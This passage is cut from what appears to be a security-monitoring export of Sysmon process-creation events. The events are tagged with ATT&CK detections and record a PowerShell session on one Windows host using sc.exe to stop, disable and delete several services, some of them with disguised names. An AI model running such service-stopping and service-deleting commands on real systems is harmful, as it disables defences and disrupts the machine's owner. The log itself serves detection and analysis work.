System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.643"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010341f2100}"",""processId"":""2096"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® 
Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.841",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.596 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010de1c2100} +ProcessId: 6588 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.598035700Z"",""eventRecordID"":""2674"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.596\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010de1c2100}\r\nProcessId: 6588\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:28.596"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010de1c2100}"",""processId"":""6588"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.806",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.549 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00104b1b2100} +ProcessId: 3460 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.551248900Z"",""eventRecordID"":""2672"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.549\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00104b1b2100}\r\nProcessId: 3460\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.549"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00104b1b2100}"",""processId"":""3460"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.791",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.533 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010841a2100} +ProcessId: 6824 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: 
""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.535468100Z"",""eventRecordID"":""2671"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.533\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010841a2100}\r\nProcessId: 6824\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.533"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010841a2100}"",""processId"":""6824"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.744",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.480 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010fd172100} +ProcessId: 2116 +Image: C:\Windows\System32\sc.exe 
+FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.482396900Z"",""eventRecordID"":""2668"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.480\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010fd172100}\r\nProcessId: 2116\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.480"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010fd172100}"",""processId"":""2116"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.697",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.407 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a3152100} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.410577300Z"",""eventRecordID"":""2665"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.407\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a3152100}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.407"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010a3152100}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.681",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.391 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010db142100} +ProcessId: 6112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Samserver Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Samserver Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.393383800Z"",""eventRecordID"":""2664"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.391\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010db142100}\r\nProcessId: 6112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Samserver Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: 